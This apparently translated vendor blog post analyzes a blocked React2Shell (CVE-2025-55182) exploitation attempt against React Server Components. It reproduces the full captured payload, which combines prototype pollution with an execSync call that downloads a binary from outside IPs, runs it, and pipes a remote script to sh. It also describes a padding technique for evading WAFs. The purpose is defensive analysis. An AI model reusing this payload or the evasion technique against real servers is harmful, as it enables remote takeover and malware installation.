HiveProtect.ai » English » blog » CVE-2025-55182, « React2Shell » et la protection proactive HiveProtect.ai

Threat analysis: CVE-2025-55182, « React2Shell » and proactive protection HiveProtect.ai

CVE-2025-55182, "React2Shell" et la protection proactive HiveProtect.ai

Report date: December 6, 2025

Severity of the threat: Critical (CVSS 10.0)

Vector: Remote Code Execution (RCE) via React Server Components

HiveProtect.ai status: BLOCKED

1. Executive Summary

In early December 2025, a critical vulnerability was disclosed in the React ecosystem, specifically affecting React Server Components (RSCs) and frameworks like Next.js. Referred to as CVE-2025-55182 (and often referred to as « React2Shell« ), this flaw allows an unauthenticated attacker to execute arbitrary code on the server by manipulating the Flight protocol serialization stream.

Meanwhile, an evasion technique known as Padding Attack has emerged to bypass traditional Web Application Firewalls (WAFs ), including Cloudflare’s default configurations. By overloading the request body beyond the standard inspection limit (often 128 KB), attackers attempt to hide their malicious payload.

This report analyzes an actual attack attempt intercepted by HiveProtect.ai on December 5, 2025. Although this attack specifically targeted Node.js/Next.js infrastructures, it was detected and neutralized by HiveProtect’s heuristic rules on a WordPress infrastructure, proving the effectiveness of a security agnostic and behavioral approach.

2. The Threat Landscape: CVE-2025-55182

2.1 The mechanics of the rift

The vulnerability lies in the way that React 19 and Next.js (App Router) handle the deserialization of data sent by the client to the server via the internal « Flight » protocol. This protocol allows the client to send complex structures, including references to server components.

The attack exploits insufficient validation during this deserialization. An attacker can forge a JSON request containing special directives (such as $1:__proto__:then) to pollute the prototype of JavaScript objects or force the server to import dangerous internal modules, such as child_process of Node.js. Once the module is imported, the attacker can call functions such as execSync to launch system commands directly on the host server.

2.2 The challenge of padding (WAF evasion)

The dangerousness of this campaign is amplified by the WAF circumvention technique. Most application firewalls, for performance reasons, only parse the beginning of an HTTP request (the first 128 KB at Cloudflare Enterprise by default, sometimes less on other plans).

The attackers have industrialized a method where they fill the beginning of the request with harmless data (spaces, comments, empty fields) to « push » the malicious payload (the RCE JSON payload ) beyond this limit. If the WAF does not strictly block large volumes of data, the payload goes undetected and reaches the vulnerable server, which will read the entire request.

3. Anatomy of the attack blocked by HiveProtect.ai

On December 5, 2025, HiveProtect.ai systems intercepted and blocked a complex exploitation attempt. Here is the forensic analysis of the captured log.

3.1 Raw log

05/12/2025 21:38	95.214.52.170
🔒 Bloquée	Warsaw, Poland 🇵🇱
🌐 API externe
DNS: DNS reverse vide	Critique	100	NoSQL Injection - Query (dans paramètres)	
📍 URL: /
🔍 Pattern détecté: /{.*?$.*?:.*?}/
🌐 User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) ...

Paramètres POST:
["{"then": "$1:__proto__:then","status": "resolved_model","reason": -1,"value": "{"then":"$B1337"}","_response": {"_prefix": "var res=process.mainModule.require('child_process').execSync('(cd /dev;busybox wget http://31.56.27.76/n2/x86;chmod 777 x86;./x86 reactOnMynuts;busybox wget -q http://193.34.213.150/nuts/bolts -O-|sh)',{'timeout':120000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});","_chunks": "$Q2","_formData": {"get": "$1:constructor:constructor"}}}",""$@0"","[]"]

3.2 Payload Decoding

This JSON code block is not a simple data injection; It is a complete execution script designed to take full control of the server. Let’s analyze it line by line:

Has. Prototype pollution (__proto__)

"then": "$1:__proto__:then"

The attacker begins by manipulating the prototype of the object being processed. This is the keystone of the CVE-2025-55182 exploit. By injecting a then property through the prototype, the attacker forces the React framework to treat its payload as an asynchronous (« Thenable ») promise, which triggers the execution of the injected code when resolving that promise.

B. The invocation of Node.js (child_process)

process.mainModule.require('child_process').execSync(...)

That’s the heart of the attack. The attacker bypasses the usual protections by directly calling the main Node.js module to request child_process. The execSync function allows synchronous (blocking) shell commands to be executed, ensuring that the server will wait for the malicious execution to complete before responding.

C. The kill chain

The command placed on the system is particularly aggressive:

  • cd /dev : Move to a directory that is usually writable on Linux systems (shared memory), often used to avoid leaving traces on the hard disk.
  • busybox wget http://31.56.27.76/n2/x86 : Downloading a malicious binary (named x86) from a remote IP (probably another compromised server acting as a command and control server – C2). The use of busybox indicates that the attack is aimed at containerized environments (Docker/Kubernetes) where standard tools such as curl or full wget are sometimes absent.
  • chmod 777 x86; ./x86 reactOnMynuts : The file is made executable and launched immediately. The reactOnMynuts argument is probably a key or flag for the malware to initialize. This binary is often a « dropper« , a botnet (Mirai type or variants) or a cryptocurrency miner.
  • busybox wget … -O-|sh : A second download phase executes a shell script (bolts) directly in memory (piped to sh), ensuring persistence or download of additional tools.

D. Exfiltration via error (NEXT_REDIRECT)

throw Object.assign(new Error('NEXT_REDIRECT'), {digest:${res}});

To see the result of their attack (the output of the command), the attacker uses an ingenious trick specific to Next.js. It generates an error of type NEXT_REDIRECT. Normally used by the framework to handle HTTP redirects, this error is here diverted to return the result of the command (${res}) in the digest field of the HTTP response. This turns a « blind » attack (Blind RCE) into an attack with immediate feedback.

3.3 Why HiveProtect.ai blocked it (rule analysis)

The log indicates a detection by the rule: NoSQL Injection – Query (in parameters).

It is crucial to note here an important technical nuance. Although the attack is a React RCE and not a NoSQL injection (MongoDB/CouchDB), the block is a perfect example of successful heuristic detection.

  • The pattern detected: /{.*?$.*?:.*?}/ This regex pattern looks for JSON structures that contain keys or values with the $ symbol. In the world of NoSQL databases, the $ is used for operators (e.g., $where, $ne).
  • The React match: The React Flight protocol also massively uses the $ symbol to reference objects and promises (e.g., $1, $B 1337, $@0).
  • The result: The HiveProtect.ai security rule, designed to intercept suspicious and non-standard data structures, correctly identified the payload as a critical anomaly. Even though the specific signature « CVE-2025-55182 » was not explicitly named, the anomalous nature of the request triggered the protection.

In addition, the threat score was maximized (100/Critical) by a contextual factor: DNS: DNS reverse empty. The attacking IP address 95.214.52.170 did not have a valid reverse DNS resolution, a typical feature of automated bots and zombie machines used in botnets. HiveProtect.ai combines behavioral analysis (the payload) and reputation (the IP) for a final blocking decision.

4. The importance of cross-sectional protection

A legitimate question might arise: « My site runs on WordPress (PHP), why HiveProtect.ai blocking an attack on Node.js? »

This is where the strength of the solution lies.

  • Protection against « Spray and Pray »: Modern botnets do not target surgically. They scan the entire IPv4 Internet. They send React exploits to PHP servers, Java exploits to Python servers, and more.
  • Resource Savings: Even if this RCE payload could not have been executed on a PHP engine, processing such a request consumes bandwidth, CPU cycles (to parse JSON or logs) and pollutes your analytical data. By blocking the request at the edge, HiveProtect.ai protects the performance of your infrastructure.
  • Defense in Depth: Modern infrastructure is often hybrid. A WordPress site can coexist on the same server as a Node.js API, or use a misconfigured reverse proxy . Blocking threats across all technologies is the only viable security approach.

5. Policy Recommendations

Following this wave of attacks and the analysis of this incident, we recommend the following actions for all administrators under HiveProtect.ai protection:

5.1 For WordPress (Standard) Environments

  • Keep the « Large Body » Rule active: As seen in padding attempts, blocking unnecessarily large request bodies (>128 KB) on standard endpoints (/, /wp-json/, forms) is an extremely effective defense against WAF bypass attempts.
  • Monitor Blocked Logs: Blocking activity on « NoSQL » or « Code Injection » rules on your WordPress site is a good indicator that your IP is in a list of active botnet targets.

5.2 For hybrid environments (WordPress + Next.js/Node)

  • Immediate Critical Update: If you host Next.js, update to version 14.2.20+, 15.0.4+, or 15.1.0+ imperatively. For React, aim for 19.0.1+. This is the only definitive correction at the root.
  • WAF curing: Make sure that your WAF rules don’t stop at inspecting headers. The combination of HiveProtect’s heuristic rules and Cloudflare’s managed rules (especially on deserialization) is essential.

Conclusion

The attack intercepted on December 5 from Poland illustrates how quickly malicious actors weaponize new vulnerabilities (CVE-2025-55182). The complex payload , combining prototype pollution, potential WAF bypass, and system command execution, represents the high end of the spectrum of current web threats.

HiveProtect.ai has demonstrated its resilience by blocking this « Zero-Day » attack (or « N-Day ») with robust behavioral detection, protecting the client infrastructure regardless of the underlying technology.